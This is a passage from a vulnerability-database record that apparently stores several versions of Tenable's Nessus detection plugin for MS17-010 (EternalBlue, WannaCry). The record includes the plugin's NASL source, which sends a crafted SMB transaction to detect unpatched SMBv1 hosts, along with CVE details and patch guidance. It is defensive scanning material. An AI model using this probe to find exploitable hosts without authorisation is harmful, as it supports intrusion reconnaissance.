and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?b9d9ebf9", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?8dcab5e4", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-22T13:00:41", "history": [{"bulletin": {"id": "MS17-010.NASL", "hash": "317afbf7b0f330e7e13446268469ccc00e586e8ef1083ae12a3ee45af28d8fa6", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-09-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97833", "reporter": "Tenable", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://support.microsoft.com/en-us/kb/2696547", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?36fd3072", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-09-08T00:21:41", "history": [], "viewCount": 4619, "enchantments": {}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2017/09/07 13:23:19 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/kb/2696547\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # http://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36fd3072\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": [], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2017-09-08T00:21:41", "differentElements": ["cpe", "modified", "references", "sourceData"], "edition": 1}, {"bulletin": {"id": "MS17-010.NASL", "hash": "792da30901508b9874d87924fbdbd7ed4db95e94cb53976cfae9e6e1b709638c", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97833", "reporter": "Tenable", "references": ["http://www.nessus.org/u?8dcab5e4", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-11-17T03:13:38", "history": [], "viewCount": 5774, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"score from a more in depth analysis done by Tenable.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, 